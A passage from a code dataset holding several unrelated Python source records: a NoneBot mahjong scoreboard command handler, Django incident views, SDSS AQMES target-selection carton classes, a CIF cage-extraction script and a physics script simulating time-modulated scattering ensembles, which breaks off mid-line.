==========\nreset_season_user_point_matcher = matcher_group.on_command(\"重置用户PT\", aliases={\"重置用户pt\", \"重置PT\", \"重置pt\"}, priority=5)\nreset_season_user_point_matcher.__help_info__ = f\"{default_cmd_start}重置PT [@<用户>]\"\n\nrequire_store_command_args(reset_season_user_point_matcher)\nrequire_platform_group_id(reset_season_user_point_matcher)\nrequire_platform_user_id(reset_season_user_point_matcher, use_sender_on_group_message=False)\n\n\n@reset_season_user_point_matcher.handle()\n@handle_error()\nasync def reset_season_user_point_confirm(bot: Bot, matcher: Matcher, session: Session = SessionDep(),\n user: User = UserDep(use_sender=False),\n group_admin=IsGroupAdminDep()):\n await send_msg(f\"确定重置用户[{await get_user_nickname(bot, user.platform_user_id, get_platform_group_id(session))}]\"\n f\"PT吗?(y/n)\")\n await matcher.pause()\n\n\n@reset_season_user_point_matcher.handle()\n@handle_error()\nasync def reset_season_user_point_end(event: Event, matcher: Matcher,\n group: Group = GroupDep(),\n user: User = UserDep(use_sender=False),\n operator: User = SenderUserDep(),\n season: Season = RunningSeasonDep()):\n if event.get_message().extract_plain_text() == 'y':\n await reset_season_user_point(season.id,\n group.id, user.id,\n operator.id)\n await matcher.send(\"重置用户PT成功\")\n else:\n await matcher.finish(\"取消重置用户PT\")\n","repo_name":"ssttkkl/nonebot-plugin-mahjong-scoreboard","sub_path":"src/nonebot_plugin_mahjong_scoreboard/controller/season_user_point_manage.py","file_name":"season_user_point_manage.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"27620283716","text":"from django.shortcuts import render\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom incidents.models import Incident\nfrom django.db.models import Max,Min,Avg,Sum\nfrom .forms import PersonForm,ContactForm\n\n# Create your views here.\n# two types - function based and class based \n\ndef list_incident(request):\n all_incidents=Incident.objects.all() # select * from incidents_incident \n all_incidents_count=Incident.objects.count() #select count(*) from incidents_incident \n context = {\n 'allincidents' : all_incidents,\n 'incident_count':all_incidents_count\n }\n return render(request,'incidents.html',context)\n\n\ndef list_incident_details(request,id):\n incident_details=Incident.objects.filter(incident_slug=id).select_related()\n context={\n 'incident_details':incident_details\n }\n return render(request,'incident_details.html',context)\n\ndef all_queries(request):\n max_incident_number=Incident.objects.all().aggregate(Max('incident_id'))\n sum_incident_number=Incident.objects.all().aggregate(Sum('incident_id'))\n \n second_largest_row=Incident.objects.order_by('-incident_date')[1]\n \n get_incident = Incident.objects.filter(\n incident_title__istartswith='I',\n incident_category__incident_category_name__startswith='T'\n )\n \n get_distinct_Incident=Incident.objects.distinct('incident_severity').order_by('-incident_severity')\n \n context={\n 'max_incident_number':max_incident_number,\n 'sum_incident_number':sum_incident_number,\n 'second_largest_row':second_largest_row,\n 'get_incident':get_incident,\n 'get_distinct_Incident':get_distinct_Incident\n }\n \n return render(request,'allqueries.html',context)\n\ndef personform(request):\n if request.method == 'POST':\n form=PersonForm(request.POST)\n if form.is_valid():\n print(form.cleaned_data)\n return HttpResponseRedirect('/incidents/')\n else:\n form=PersonForm()\n \n return render(request,'person/personform.html',{'pform':form})\n\n\ndef contactform(request):\n if request.method == 'POST':\n form=ContactForm(request.POST)\n print(form)\n if form.is_valid():\n print(form.cleaned_data)\n form.save()\n return HttpResponseRedirect('you are successfully submitted')\n \n else:\n form=ContactForm()\n \n return render(request,'person/contactform.html',{'cform':form})\n \n \n\n\n\n","repo_name":"iampython-team/Django-IMS","sub_path":"IMS_Project/incidents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31762983102","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# @Author: Tom Dwelly\n# @Date: 2020-03-03\n# @Filename: bhm_aqmes.py\n# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)\n\n# isort: skip_file\n\nimport peewee\n# from peewee import JOIN\n# from peewee import fn\nfrom astropy.io import fits\nimport pkg_resources\n\n\nfrom sdssdb.peewee.sdss5db.catalogdb import (\n Catalog,\n SDSS_DR19p_Speclite,\n SDSS_DR16_QSO,\n CatalogFromSDSS_DR19p_Speclite,\n)\n\n# DEBUG STUFF TO USE TEMP TABLE\n# CatalogToSDSS_DR19p_Speclite._meta.table_name = 'temp_catalog_to_sdss_dr19p_speclite'\n# CatalogToSDSS_DR19p_Speclite._meta._schema = 'sandbox'\n\nfrom target_selection.cartons.base import BaseCarton\n\n# this should probably live in a better place\nradius_apo = 1.49 # degrees\n\n# Details: Start here\n# https://wiki.sdss.org/display/OPS/Defining+target+selection+and+cadence+algorithms#Definingtargetselectionandcadencealgorithms-AQMES-medium-inprogress # noqa: E501\n\n# This provides the following BHM cartons:\n# bhm_aqmes_med\n# bhm_aqmes_med_faint\n# bhm_aqmes_wide2\n# bhm_aqmes_wide2_faint\n# # bhm_aqmes_wide3 # dumped in v0.5\n# # bhm_aqmes_wide3-faint # dumped in v0.5\n# bhm_aqmes_bonus_dark\n# bhm_aqmes_bonus_bright\n\n# how do we relate the cadence names in v0.5, 1.0 to cadence names in v0?\n\ncadence_map_v0p5_to_v0 = {\n 'dark_10x4': 'bhm_aqmes_medium_10x4',\n 'dark_10x4_4yr': 'bhm_aqmes_medium_10x4',\n # 'dark_3x4': 'bhm_aqmes_wide_3x4',\n 'dark_2x4': 'bhm_aqmes_wide_2x4',\n 'dark_1x4': 'bhm_spiders_1x4',\n 'bright_3x1': 'bhm_boss_bright_3x1',\n}\ncadence_map_v1_to_v0 = {\n 'dark_10x4': 'bhm_aqmes_medium_10x4',\n 'dark_10x4_4yr': 'bhm_aqmes_medium_10x4',\n 'dark_2x4': 'bhm_aqmes_wide_2x4',\n 'dark_1x4': 'bhm_spiders_1x4',\n 'dark_flexible_2x2': 'bhm_spiders_1x4',\n 'bright_3x1': 'bhm_boss_bright_3x1',\n 'bright_flexible_2x1': 'bhm_boss_bright_2x1',\n}\n\n\nclass BhmAqmesBaseCarton(BaseCarton):\n\n '''\n Parent class that provides the underlying selections for all AQMES cartons\n '''\n\n name = 'bhm_aqmes_base'\n category = 'science'\n mapper = 'BHM'\n program = 'bhm_aqmes'\n instrument = 'BOSS'\n inertial = True\n tile = False\n priority = None\n alias_c = None\n alias_t = None\n alias_c2s = None\n cadence = None\n cadence_v0p5 = None\n\n # read the AQMES field centres from a fits file and convert to a list of dicts\n def get_fieldlist(self, cadence_v1=None):\n stub = self.parameters.get('fieldlist', None)\n if stub is None or stub == '' or stub == 'None':\n return None\n\n # filename = pkg_resources.resource_filename( __name__, stub)\n filename = pkg_resources.resource_filename('target_selection', stub)\n assert len(filename) > 0\n\n try:\n hdul = fits.open(filename)\n except BaseException:\n raise Exception(f\"Failed to find/open fieldlist file: {filename}\")\n\n assert len(hdul[1].data) > 0\n\n # choose the correct subset of fields based on the cadence name and form a list of dicts\n # we have to use the v0 cadence names though\n assert cadence_v1 in cadence_map_v1_to_v0\n cadence_v0 = cadence_map_v1_to_v0[cadence_v1]\n\n try:\n fieldlist = [\n {'racen': r['RACEN'],\n 'deccen': r['DECCEN'],\n 'radius': radius_apo, }\n for r in hdul[1].data\n if r['CADENCE'] == cadence_v0\n ]\n except BaseException:\n raise Exception(f\"Error interpreting contents of fieldlist file: {filename}\")\n\n assert len(fieldlist) > 0\n\n return fieldlist\n\n def append_spatial_query(self, query, fieldlist):\n '''Extend the peewee query using a list of field centres'''\n if fieldlist is None:\n return query\n elif len(fieldlist) == 0:\n return query\n\n q = False\n for f in fieldlist:\n q = (q | peewee.fn.q3c_radial_query(self.alias_c.ra,\n self.alias_c.dec,\n f['racen'],\n f['deccen'],\n f['radius']))\n return query.where(q)\n\n # main query\n def build_query(self, version_id, query_region=None):\n c = Catalog.alias()\n c2s = CatalogFromSDSS_DR19p_Speclite.alias()\n s = SDSS_DR19p_Speclite.alias()\n t = SDSS_DR16_QSO.alias()\n self.alias_c = c\n self.alias_t = t\n self.alias_c2s = c2s\n\n # set the Carton priority+values here - read from yaml\n priority_floor = peewee.Value(int(self.parameters.get('priority', 999999)))\n value = peewee.Value(self.parameters.get('value', 1.0)).cast('float')\n instrument = peewee.Value(self.instrument)\n inertial = peewee.Value(self.inertial).cast('bool')\n opt_prov = peewee.Value('sdss_psfmag')\n # for v1 read cadence from param file rather than from class code\n cadence_v1 = self.parameters.get('cadence', 'unknown')\n cadence = peewee.Value(cadence_v1).cast('text')\n cadence_v0 = peewee.Value(cadence_map_v1_to_v0[cadence_v1]).cast('text')\n # cadence_v0 = peewee.Value(cadence_map_v0p5_to_v0[self.cadence_v0p5]).cast('text')\n # cadence = peewee.Value(self.cadence_v0p5).cast('text')\n\n priority = priority_floor\n\n magnitude_sdss_g = peewee.Case(\n None, ((t.psfmag[1].between(0.1, 29.9), t.psfmag[1]),), 'NaN').cast('float')\n magnitude_sdss_r = peewee.Case(\n None, ((t.psfmag[2].between(0.1, 29.9), t.psfmag[2]),), 'NaN').cast('float')\n magnitude_sdss_i = peewee.Case(\n None, ((t.psfmag[3].between(0.1, 29.9), t.psfmag[3]),), 'NaN').cast('float')\n magnitude_sdss_z = peewee.Case(\n None, ((t.psfmag[4].between(0.1, 29.9), t.psfmag[4]),), 'NaN').cast('float')\n magnitude_gaia_g = peewee.Case(\n None, ((t.gaia_g_mag.between(0.1, 29.9), t.gaia_g_mag),), 'NaN').cast('float')\n magnitude_gaia_bp = peewee.Case(\n None, ((t.gaia_bp_mag.between(0.1, 29.9), t.gaia_bp_mag),), 'NaN').cast('float')\n magnitude_gaia_rp = peewee.Case(\n None, ((t.gaia_rp_mag.between(0.1, 29.9), t.gaia_rp_mag),), 'NaN').cast('float')\n\n query = (\n c.select(\n c.catalogid,\n t.pk.alias('dr16q_pk'), # extra\n s.pk.alias('dr19p_pk'), # extra\n c.ra, # extra\n c.dec, # extra\n t.ra.alias('dr16q_ra'), # extra\n t.dec.alias('dr16q_dec'), # extra\n priority.alias('priority'),\n value.alias('value'),\n inertial.alias('inertial'),\n instrument.alias('instrument'),\n cadence.alias('cadence'),\n cadence_v0.alias('cadence_v0'), # extra\n opt_prov.alias('optical_prov'),\n magnitude_sdss_g.alias('g'),\n magnitude_sdss_r.alias('r'),\n magnitude_sdss_i.alias('i'),\n magnitude_sdss_z.alias('z'),\n magnitude_gaia_g.alias('gaia_g'),\n magnitude_gaia_bp.alias('bp'),\n magnitude_gaia_rp.alias('rp'),\n t.plate.alias('dr16q_plate'), # extra\n t.mjd.alias('dr16q_mjd'), # extra\n t.fiberid.alias('dr16q_fiberid'), # extra\n t.gaia_ra.alias(\"dr16q_gaia_ra\"), # extra\n t.gaia_dec.alias(\"dr16q_gaia_dec\"), # extra\n t.sdss2gaia_sep.alias(\"dr16q_sdss2gaia_sep\"), # extra\n t.z.alias(\"dr16q_redshift\"), # extra\n c2s.best.alias(\"c2s_best\"), # extra\n s.pk.alias(\"s19p_pk\"), # extra\n s.specprimary.alias(\"s19p_specprimary\"), # extra\n )\n .join(c2s)\n .join(s)\n .join(\n t,\n on=((s.plate == t.plate) &\n (s.mjd == t.mjd) &\n (s.fiberid == t.fiberid))\n )\n .where(\n c.version_id == version_id,\n c2s.version_id == version_id,\n c2s.best >> True, # TODO check this is working in v1.0\n # # - this condition killed many AQMES\n # # targets in v0+v0.5 cross-matches\n )\n .where\n (\n t.psfmag[3] >= self.parameters['mag_i_min'],\n t.psfmag[3] < self.parameters['mag_i_max'],\n )\n # .distinct([t.pk]) # avoid duplicates - trust the QSO parent sample\n .distinct([c.catalogid]) # avoid duplicates - trust the catalog\n )\n\n query = self.append_spatial_query(query, self.get_fieldlist(cadence_v1))\n\n return query\n\n\n# -------AQMES medium section ------ #\n\n\nclass BhmAqmesMedCarton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso\n WHERE psfmag_i BETWEEN 16.x AND 19.1\n AND {target lies in spatial selection}\n '''\n name = 'bhm_aqmes_med'\n # cadence_v0p5 = 'dark_10x4_4yr'\n\n # TD's note to self:\n # add something like the following if want to add carton-specific selections\n # def build_query(self, version_id, query_region=None):\n # query = super().build_query(version_id, query_region)\n # query = query.where( # .... add extra terms here\n # )\n # return query\n\n\nclass BhmAqmesMedFaintCarton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso\n WHERE psfmag_i BETWEEN 19.1 AND 21.0\n AND {target lies in spatial selection}\n '''\n name = 'bhm_aqmes_med_faint'\n # cadence_v0p5 = 'dark_10x4_4yr'\n program = 'bhm_filler'\n\n# -------AQMES medium section ----- #\n#\n#\n\n#\n# -------AQMES wide section ------ #\n\n\n# class BhmAqmesWide3Carton(BhmAqmesBaseCarton):\n# '''\n# SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 16.0 AND 19.1\n# '''\n# name = 'bhm_aqmes_wide3'\n# cadence_v0p5 = 'dark_3x4'\n#\n#\n# class BhmAqmesWide3FaintCarton(BhmAqmesBaseCarton):\n# '''\n# SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 19.1 AND 21.0\n# '''\n# name = 'bhm_aqmes_wide3_faint'\n# cadence_v0p5 = 'dark_3x4'\n# program = 'bhm_filler'\n\n\nclass BhmAqmesWide2Carton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 16.0 AND 19.1\n '''\n name = 'bhm_aqmes_wide2'\n # cadence_v0p5 = 'dark_2x4'\n\n\nclass BhmAqmesWide2FaintCarton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 19.1 AND 21.0\n '''\n name = 'bhm_aqmes_wide2_faint'\n # cadence_v0p5 = 'dark_2x4'\n program = 'bhm_filler'\n\n# -------AQMES wide section ------ #\n\n\n# -------AQMES bonus section ------ #\n\nclass BhmAqmesBonusCoreCarton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 16.0 AND 19.1\n {NO spatial constraint}\n '''\n name = 'bhm_aqmes_bonus_core'\n # cadence_v0p5 = 'dark_1x4'\n program = 'bhm_filler'\n\n\nclass BhmAqmesBonusFaintCarton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 19.1 AND 21.0\n '''\n name = 'bhm_aqmes_bonus_faint'\n # cadence_v0p5 = 'dark_1x4'\n program = 'bhm_filler'\n\n\nclass BhmAqmesBonusBrightCarton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 14.0 AND 18.0\n '''\n name = 'bhm_aqmes_bonus_bright'\n # cadence_v0p5 = 'bright_3x1'\n program = 'bhm_filler'\n\n# ------- AQMES bonus section ------ #\n","repo_name":"sdss/target_selection","sub_path":"python/target_selection/cartons/bhm_aqmes.py","file_name":"bhm_aqmes.py","file_ext":"py","file_size_in_byte":11674,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"1591060846","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Distributed under the terms of the MIT License.\n\n\"\"\"\nScript to extract all independant cages from a CIF using pyWindow code.\n\nAuthor: Andrew Tarzia\n\nDate Created: 04 Apr 2019\n\n\"\"\"\n\nimport sys\nimport atools\n\n\ndef main():\n if (not len(sys.argv) == 2):\n print(\"\"\"\nUsage: extract_indep_cages.py CIF\n CIF (str) - name of CIF to analyze\n \"\"\")\n sys.exit()\n else:\n CIF = sys.argv[1]\n\n if CIF[-4:] != '.cif':\n raise Exception('input file: {} was not a CIF'.format(CIF))\n\n pdb_file, struct = atools.convert_CIF_2_PDB(CIF)\n if pdb_file is None and struct is None:\n sys.exit()\n rebuilt_structure = atools.modularize(file=pdb_file)\n if rebuilt_structure is None:\n # handle pyWindow failure\n sys.exit(f'pyWindow failure on {pdb_file}')\n res = atools.analyze_rebuilt(rebuilt_structure, file_prefix=CIF.rstrip('.cif'),\n atom_limit=20, include_coms=False, verbose=False)\n print('===================================================')\n print('Results of pyWindow analysis on all indep cages:')\n print('===================================================')\n for i in res:\n try:\n print('cage {}:'.format(i))\n print('has {} windows of diameter:'.format(len(res[i][1]['diameters'])))\n print(res[i][1]['diameters'])\n except TypeError:\n print(res[i])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"andrewtarzia/cage_collect","sub_path":"extract_indep_cages.py","file_name":"extract_indep_cages.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69861275346","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom matplotlib.gridspec import GridSpec\nfrom matplotlib.colors import ListedColormap\n\nfrom multiprocessing import Pool\nfrom time import time\n\nimport TMM\n\nmatplotlib.rcParams.update({'font.size': 7})\nmatplotlib.rcParams.update({'axes.linewidth': 0.5})\nmatplotlib.rcParams.update({'ytick.direction': 'in'})\nmatplotlib.rcParams.update({'xtick.direction': 'in'})\nmatplotlib.rcParams.update({'ytick.major.width': 0.5})\nmatplotlib.rcParams.update({'xtick.major.width': 0.5})\nmatplotlib.rcParams.update({'ytick.minor.width': 0.5})\nmatplotlib.rcParams.update({'xtick.minor.width': 0.5})\nmatplotlib.rcParams.update({'figure.figsize': [3.375 *2, 2.5 * 1.8]})\nmatplotlib.rcParams.update({'savefig.pad_inches': 0.02}) #default 0.1\nmatplotlib.rcParams.update({'savefig.format': 'png'}) #default 0.1\nmatplotlib.rcParams.update({'figure.subplot.bottom': 0.05,\n 'figure.subplot.hspace': 0,\n 'figure.subplot.left': 0.05,\n 'figure.subplot.right': 0.95,\n 'figure.subplot.top': 0.95,\n 'figure.subplot.wspace': 0}) #default 0.125, 0.2, 0.125, 0.9, 0.88, 0.2\n\n\n\n\n#%% Design\n\na = 1\nomega_b = 2*np.pi / a\ndt = a *0.01 \n\nTp = 20\n\ntau = np.arange(-(Tp)*a, (Tp)*a+dt/10, dt)\n\ndelta = 0.01 / Tp\nomega = np.linspace(-3*omega_b, 3*omega_b, 3001)\ndomega = omega[1]-omega[0]\n\n\nN_list = 11\nA = 105*np.pi / (256*omega_b)\nS0 = (16/7)*A * np.linspace(0,1,N_list)\ncoeff_b = S0/16\ncoeff_a = (A-7*coeff_b)/4\n\nS_list = (np.abs(omega/omega_b)<2).reshape(1,-1) * ((4-(omega/omega_b)**2)**2).reshape(1,-1) * (coeff_a.reshape(-1,1)@ ((omega/omega_b)**2).reshape(1,-1) + coeff_b.reshape(-1,1))\nS_fw_list = S_list * (delta**2) # Time structure factor for controling of forward scattering (Eq S35)\nR_fw_list = np.real([np.sum([s*np.exp(-1j*om*tau)*domega/(2*np.pi) for s, om in zip(S, omega)], axis=0) for S in S_fw_list])\n\n\nA = 20*np.pi/(27 * omega_b)\nS2w = 4*A/5 * np.linspace(0, 1, N_list)\ncoeff_b = S2w/4\ncoeff_a = (A - 5*coeff_b)/2\nS_list = ((np.abs(omega/omega_b)<3)* (omega/omega_b)**2 * (3 - np.abs(omega)/omega_b)).reshape(1,-1) * (coeff_a.reshape(-1,1)@((np.abs(omega/omega_b)-2)**2).reshape(1,-1) + coeff_b.reshape(-1,1) )\nS_bw_list = S_list * (delta**2) # Time structure factor for controling of backward scattering (Eqs S36 and S37)\nR_bw_list = np.real([np.sum([s*np.exp(-1j*om*tau)*domega/(2*np.pi) for s, om in zip(S, omega)], axis=0) for S in S_bw_list])\n\n\nt_idx = np.arange(-round(Tp/dt), 0)\nRcenter_idx = np.argmin(np.abs(tau))\n\n\ndef int_1d_stat(R):\n S0 = np.sum([r*np.exp(1j*0*tau0) *dt for r, tau0 in zip(R, tau)])\n S2w = np.sum([r*np.exp(1j*2*omega_b*tau0) *dt for r, tau0 in zip(R, tau)])\n return omega_b*S0, omega_b*S2w\n\n\nwith Pool(30) as pool:\n Int_1d_stat_ctrlfw = np.array(pool.map(int_1d_stat, R_fw_list)) # Forward scattering power for eq (6)\n Int_1d_stat_ctrlbw = np.array(pool.map(int_1d_stat, R_bw_list)) # Backward scattering power for eq (6)\n\n\n\n#%% covariance matrix\n\nt = np.arange(0*a, (Tp-dt/10)*a, dt)\ntic = time()\ntau0_idx = np.argmin(np.abs(tau))\n\ndef row(R, i):\n return np.array(R[tau0_idx+(0-i):tau0_idx+(len(t)-i)] )\n\ndef complex_block(mat):\n return 0.5 * np.block([[np.real(mat), -np.imag(mat)],[np.imag(mat), np.real(mat)]])\n\nwith Pool(30) as pool:\n cov_alpha_fw_list = [np.array(pool.starmap(row, zip([R]*len(t), range(len(t))))) for R in R_fw_list]\n cov_alpha_bw_list = [np.array(pool.starmap(row, zip([R]*len(t), range(len(t))))) for R in R_bw_list]\n\n\n\n#%% Fig S4: ensemble structure factor validation / estimation\n\nN_ens = 10000\ndalpha_ens_fw = [np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_fw_list[0], size=N_ens),\n np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_fw_list[5], size=N_ens),\n np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_fw_list[10], size=N_ens)]\ndalpha_ens_bw = [np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_bw_list[0], size=N_ens),\n np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_bw_list[5], size=N_ens),\n np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha_bw_list[10], size=N_ens)]\n\nR_fw, R_bw = [], []\nS_cal_fw, S_cal_bw = [], []\n\nfor ii in range(3):\n for N_include in [100, 1000, 10000]:\n R = []\n for tau0 in tau:\n idx_diff = round(tau0/dt)\n if idx_diff >=0:\n R.append(np.mean( np.conj(dalpha_ens_fw[ii][:N_include,idx_diff:])*dalpha_ens_fw[ii][:N_include,:len(t)-idx_diff] ))\n else:\n idx_diff = np.abs(idx_diff)\n R.append( np.conj(np.mean( np.conj(dalpha_ens_fw[ii][:N_include,idx_diff:])*dalpha_ens_fw[ii][:N_include,:len(t)-idx_diff] )) )\n R = np.array(R)\n S = np.sum([r*np.exp(1j*omega*tau0) * dt for r, tau0 in zip(R[1:-1], tau[1:-1])], axis=0)\n R_fw.append(R)\n S_cal_fw.append(S)\n \n R = []\n for tau0 in tau:\n idx_diff = round(tau0/dt)\n if idx_diff >=0:\n R.append(np.mean( np.conj(dalpha_ens_bw[ii][:N_include,idx_diff:])*dalpha_ens_bw[ii][:N_include,:len(t)-idx_diff] ))\n else:\n idx_diff = np.abs(idx_diff)\n R.append( np.conj(np.mean( np.conj(dalpha_ens_bw[ii][:N_include,idx_diff:])*dalpha_ens_bw[ii][:N_include,:len(t)-idx_diff] )) )\n R = np.array(R)\n S = np.sum([r*np.exp(1j*omega*tau0) * dt for r, tau0 in zip(R[1:-1], tau[1:-1])], axis=0)\n R_bw.append(R)\n S_cal_bw.append(S)\n\nfig, ax = plt.subplots(3,2, figsize=(6, 3.5), sharex=True)\nfor ii in range(3):\n ax[ii,0].plot(omega/omega_b, np.real(S_fw_list[5*ii])/delta**2, lw=2, color='crimson', label='Target', zorder=10)\n ax[ii,0].plot(omega/omega_b, np.real(S_cal_fw[3*ii])/delta**2, lw=0.5, color='lightsteelblue', ls='-', zorder=1, label=r'$N_\\mathrm{ens}=10^2$')\n ax[ii,0].plot(omega/omega_b, np.real(S_cal_fw[3*ii+1])/delta**2, lw=0.5, color='royalblue', ls='-', zorder=5, label=r'$N_\\mathrm{ens}=10^3$')\n ax[ii,0].plot(omega/omega_b, np.real(S_cal_fw[3*ii+2])/delta**2, lw=1, color='midnightblue', ls='-', zorder=100, label=r'$N_\\mathrm{ens}=10^4$')\n \n ax[ii,1].plot(omega/omega_b, np.real(S_bw_list[5*ii])/delta**2, lw=2, color='crimson', zorder=10)\n ax[ii,1].plot(omega/omega_b, np.real(S_cal_bw[3*ii])/delta**2, lw=0.5, color='lightsteelblue', ls='-', zorder=1)\n ax[ii,1].plot(omega/omega_b, np.real(S_cal_bw[3*ii+1])/delta**2, lw=0.5, color='royalblue', ls='-', zorder=5)\n ax[ii,1].plot(omega/omega_b, np.real(S_cal_bw[3*ii+2])/delta**2, lw=1, color='midnightblue', ls='-', zorder=100)\n\nax[2,0].set(xlim=(-3,3), xlabel=r'$\\omega/\\omega_0$')\nax[1,0].set(ylabel=r'$S_\\mathrm{FW}(\\omega)/\\delta^2$')\nax[2,1].set(xlim=(-3,3), xlabel=r'$\\omega/\\omega_0$')\nax[1,1].set(ylabel=r'$S_\\mathrm{BW}(\\omega)/\\delta^2$')\n\nax[0,0].legend(frameon=False, loc=2, fontsize=6.7, ncol=2)\nfig.tight_layout()\nfig.savefig('FigS2_validation_Sw.pdf', format='pdf', dpi=1200)\nfig.savefig('FigS2_validation_Sw.png', format='png', dpi=400)\n\n\n\n#%% Scattering ensemable simulation, data generation\n\nN_ens = 10000\n\ndef intensity_oscillation(cov_alpha):\n P_forward_TMM, P_backward_TMM = [], []\n np.random.seed(0)\n \n dalpha_ens = np.random.multivariate_normal(np.zeros_like(np.hstack([t])), cov_alpha, size=N_ens)\n \n for dalpha in dalpha_ens:\n alpha = 1+ dalpha\n sys = TMM.time_dep(dt*np.ones_like(t), 1/alpha, np.ones_like(t), 1, 1)\n trans, reflec = sys.evolution(omega_b)[3:5]\n P_forward = np.abs(trans-np.exp(-1j*omega_b*Tp))**2\n P_backward = np.abs(reflec)**2\n P_forward_TMM.append(P_forward)\n P_backward_TMM.append(P_backward)\n return np.array(P_forward_TMM), np.array(P_backward_TMM)\n\n\ntic = time()\n\nP_ctrlfw_ens = [intensity_oscillation(cov) for cov in cov_alpha_fw_list] # TMM data for Fig 2c\nP_ctrlbw_ens = [intensity_oscillation(cov) for cov in cov_alpha_bw_list] # TMM data for Fig 2d\n\n\nP_ctrlfw_fw_ens = np.array([pens[0] for pens in P_ctrlfw_ens])\nP_ctrlfw_bw_ens = np.array([pens[1] for pens in P_ctrlfw_ens])\nP_ctrlbw_fw_ens = np.array([pens[0] for pens in P_ctrlbw_ens])\nP_ctrlbw_bw_ens = np.array([pens[1] for pens in P_ctrlbw_ens])\n\ntoc = time()\nprint(toc-tic)\n\nnp.savetxt('Data_Fig2_fwctrl_fw_ens.csv', P_ctrlfw_fw_ens, delimiter=' ')\nnp.savetxt('Data_Fig2_fwctrl_bw_ens.csv', P_ctrlfw_bw_ens, delimiter=' ')\nnp.savetxt('Data_Fig2_bwctrl_fw_ens.csv', P_ctrlbw_fw_ens, delimiter=' ')\nnp.savetxt('Data_Fig2_bwctrl_bw_ens.csv', P_ctrlbw_bw_ens, delimiter=' ')\n\n\n\n\n#%% Fig 2\n\nP_ctrlfw_fw_ens = np.loadtxt('Data_Fig2_fwctrl_fw_ens.csv', delimiter=' ') # Change this file name if you want to check the ensemble data in the manuscript (data link at README.md)\nP_ctrlfw_bw_ens = np.loadtxt('Data_Fig2_fwctrl_bw_ens.csv', delimiter=' ') # Change this file name if you want to check the ensemble data in the manuscript (data link at README.md)\nP_ctrlbw_fw_ens = np.loadtxt('Data_Fig2_bwctrl_fw_ens.csv', delimiter=' ') # Change this file name if you want to check the ensemble data in the manuscript (data link at README.md)\nP_ctrlbw_bw_ens= np.loadtxt('Data_Fig2_bwctrl_bw_ens.csv', delimiter=' ') # Change this file name if you want to check the ensemble data in the manuscript (data link at README.md)\n\n\ncs = np.array([0.2,0.2,0.2,1]).reshape(1,-1)\nce = np.array(matplotlib.colors.to_rgba('mediumvioletred')).reshape(1,-1)\nnewcolors = cs + np.linspace(0,1,256).reshape(-1,1) @ (ce-cs)\ncmap1 = ListedColormap(newcolors)\n\nce = np.array(matplotlib.colors.to_rgba('royalblue')).reshape(1,-1)\nnewcolors = cs + np.linspace(0,1,256).reshape(-1,1) @ (ce-cs)\ncmap2 = ListedColormap(newcolors)\n\nfig = plt.figure(figsize=(7.08, 2.4))\ngs = GridSpec(nrows=125, ncols=200)\n\n\n\nax = np.array([fig.add_subplot(gs[10:58,0:33]), fig.add_subplot(gs[62:110,0:33]),\n fig.add_subplot(gs[10:41,51:98]), \n fig.add_subplot(gs[44:76,51:98]),\n fig.add_subplot(gs[79:110,51:98]),\n fig.add_subplot(gs[10:58,128:158]), fig.add_subplot(gs[10:58,170:200]),\n fig.add_subplot(gs[62:110,128:158]), fig.add_subplot(gs[62:110,170:200])])\n\n\n# Fig 2a\nfor ii in range(N_list):\n c1 = cmap1(ii/(N_list)*0.999)\n ax[0].plot(omega/omega_b, S_fw_list[ii]*omega_b/delta**2, c=c1, lw=1)\n \n c2 = cmap2(ii/(N_list)*0.999)\n ax[1].plot(omega/omega_b, S_bw_list[ii]*omega_b/delta**2, c=c2, lw=1)\n \nax[0].set_title('Structure factor', fontsize=7)\nax[0].set(xticks=np.linspace(-2,2,3), xticklabels=[], xlim=(-3,3),\n ylabel=r'$S_\\mathrm{FW}(\\omega)$', ylim=(0,np.max(S_fw_list*omega_b/delta**2)))\nax[1].set(xticks=np.linspace(-2,2,3), xlabel=r'$\\omega/\\omega_0$', xlim=(-3,3),\n ylabel=r'$S_\\mathrm{BW}(\\omega)$', ylim=(0,np.max(S_bw_list*omega_b/delta**2)))\n\n\n# Fig 2b\nt_before = np.arange(-1*a, 0-dt/10, dt)\nt_after = np.arange(Tp*a, (Tp+1)*a-dt/10, dt)\nt_tot = np.arange(-1*a, (Tp+1)*a-dt/10, dt)\n\nSrc_Data_2b = []\n\nN_rep = 0\nnp.random.seed(2)\ndalpha = np.random.multivariate_normal(np.zeros_like(np.hstack([t])), 